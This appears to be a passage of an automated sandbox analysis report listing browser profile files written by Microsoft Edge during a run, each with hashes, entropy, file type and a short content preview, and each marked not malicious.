                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
                                                                                                                                                                                                                                                                                                                                MD5:F32592F4926E25E0D647EA7E4CBCD3FE
                                                                                                                                                                                                                                                                                                                                SHA1:4126DAA71810BDC438563699F77D5DA66DD3295E
                                                                                                                                                                                                                                                                                                                                SHA-256:BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
                                                                                                                                                                                                                                                                                                                                SHA-512:96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF391f0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF392bb.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d862a150-27d1-4870-9c65-93753713706b.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):422
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.249606044556134
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ymPHN+q2P923oH+TcwtzjqEKj0QMxIFUt8hzXZmw+hLbVkwO923oH+TcwtzjqEKG:bPov4YebvqBZFUt8l/+T5LYebvqBaJ
                                                                                                                                                                                                                                                                                                                                MD5:31CEF16B64B823A2F64FFE9930CBE21E
                                                                                                                                                                                                                                                                                                                                SHA1:97C03762B3A3BF9809902310E3E630CAB0A47AF2
                                                                                                                                                                                                                                                                                                                                SHA-256:BF756B179E0BFB7DC12E7BAB202E109611872DD462BCB4432EFA5D3BABF4F92C
                                                                                                                                                                                                                                                                                                                                SHA-512:90F4885FD8B836739002C1A0ECF4612F9E8F829B2915B171AA6A1F4AC15BE2A14C78046E015979C9C3EEC508992F3F82884E35536958D6E7C6715934CBAE8DA1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:39.519 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/10/28-17:02:39.521 19e8 Recovering log #3.2024/10/28-17:02:39.525 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):422
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.249606044556134
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ymPHN+q2P923oH+TcwtzjqEKj0QMxIFUt8hzXZmw+hLbVkwO923oH+TcwtzjqEKG:bPov4YebvqBZFUt8l/+T5LYebvqBaJ
                                                                                                                                                                                                                                                                                                                                MD5:31CEF16B64B823A2F64FFE9930CBE21E
                                                                                                                                                                                                                                                                                                                                SHA1:97C03762B3A3BF9809902310E3E630CAB0A47AF2
                                                                                                                                                                                                                                                                                                                                SHA-256:BF756B179E0BFB7DC12E7BAB202E109611872DD462BCB4432EFA5D3BABF4F92C
                                                                                                                                                                                                                                                                                                                                SHA-512:90F4885FD8B836739002C1A0ECF4612F9E8F829B2915B171AA6A1F4AC15BE2A14C78046E015979C9C3EEC508992F3F82884E35536958D6E7C6715934CBAE8DA1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:39.519 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/10/28-17:02:39.521 19e8 Recovering log #3.2024/10/28-17:02:39.525 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.224098073623503
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yHq2P923oH+TcwtpIFUt8htXZmw+htFkwO923oH+Tcwta/WLJ:ev4YebmFUt87X/+7F5LYebaUJ
                                                                                                                                                                                                                                                                                                                                MD5:1C9F272F702CE09E94215906AEFF3E55
                                                                                                                                                                                                                                                                                                                                SHA1:2D56BA8DF2634689BD75D8A52AAD016BED1F1DCC
                                                                                                                                                                                                                                                                                                                                SHA-256:DF5E858BDC254851AA330E391D4C2F39759E06598FD9B6CDAFDCA3B643B0CDCB
                                                                                                                                                                                                                                                                                                                                SHA-512:FC09B6492EAD3D90B4B41A32C56A13CADB42EC24F8EAEFB807B345D07EFF2DB6B4BD0606E95A49B4748BCBCCF04EA8D865150EA8E6900B37520680AFB06E00CD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.694 1ce4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/10/28-17:02:19.695 1ce4 Recovering log #3.2024/10/28-17:02:19.695 1ce4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.224098073623503
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yHq2P923oH+TcwtpIFUt8htXZmw+htFkwO923oH+Tcwta/WLJ:ev4YebmFUt87X/+7F5LYebaUJ
                                                                                                                                                                                                                                                                                                                                MD5:1C9F272F702CE09E94215906AEFF3E55
                                                                                                                                                                                                                                                                                                                                SHA1:2D56BA8DF2634689BD75D8A52AAD016BED1F1DCC
                                                                                                                                                                                                                                                                                                                                SHA-256:DF5E858BDC254851AA330E391D4C2F39759E06598FD9B6CDAFDCA3B643B0CDCB
                                                                                                                                                                                                                                                                                                                                SHA-512:FC09B6492EAD3D90B4B41A32C56A13CADB42EC24F8EAEFB807B345D07EFF2DB6B4BD0606E95A49B4748BCBCCF04EA8D865150EA8E6900B37520680AFB06E00CD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.694 1ce4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/10/28-17:02:19.695 1ce4 Recovering log #3.2024/10/28-17:02:19.695 1ce4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2648668336457682
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumK:Bq+n0Jb9ELyKOMq+8y9/OwN
                                                                                                                                                                                                                                                                                                                                MD5:C2440D636A51CB4BFE9F541584194A34
                                                                                                                                                                                                                                                                                                                                SHA1:2EA4E4D2DC97C1A4AF2A54F1300E03D8BB67830A
                                                                                                                                                                                                                                                                                                                                SHA-256:07352B585A47DBDCBD618919732F6BB59A6ED7FEB81A8E9F0E72BA7525E31BAC
                                                                                                                                                                                                                                                                                                                                SHA-512:7522DA64157503347BE93C4949BC3BD2D7DD495B4115B4C8E6FAEE0FF8CD0CA7D31F52EA6DEBC78B3DDE09EA38DFBD0AE1109717795137E35BFD8DFCA134DA59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4671850037755905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB04OM:v7doKsKuKZKlZNmu46yjx0S
                                                                                                                                                                                                                                                                                                                                MD5:79777FD13D521368B1E2DC5452EF9617
                                                                                                                                                                                                                                                                                                                                SHA1:66E766C4F482EC7CBCA52ED311350073F339CA3E
                                                                                                                                                                                                                                                                                                                                SHA-256:A101D608AE711C159B08541BF8AD2B1436B98EFA826D15AE578A1D3F13E3299B
                                                                                                                                                                                                                                                                                                                                SHA-512:BB251C988356B158B2E1502F78D605682E76B3DF11DC6C27D8159A188D8467A11678834D64C35231F3A5DEA8DAE405CE217AEBD1C238A21CF21A133F0B809641
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b458f8e3-7e46-48c4-b97f-f9810f04b20f.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):13080
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.285861645821198
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:stOJ99QTryDigabatSuypXs2JtsZiheb2kegEp8wbV+FVTQA66WYaFIMYCP7YJ:stOPGKSu4Xsatfhec/bGFQx6WYaTYP
                                                                                                                                                                                                                                                                                                                                MD5:BDCCA55D8A9752CEA6DDA9C18D6F7F2F
                                                                                                                                                                                                                                                                                                                                SHA1:6263377AEF47C2F9928503F93B43121E7BCE97B9
                                                                                                                                                                                                                                                                                                                                SHA-256:550C25F93D995BEFABBA5F471349472D36369CCBD09EAE9C9DDA898BD8453D04
                                                                                                                                                                                                                                                                                                                                SHA-512:040091E3888D5B84A485CA634A5EBBE7FE847A449ACCAC4E9370489FE016026619B4E032B7EC596BB2463DCBA921CD65D676D743868019F2226B26F918D6F73C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c8ad58ec-1414-40e9-a4fd-3f640e29864c.tmp

                                                                                                                                                                                                                                                                                                                                Download File
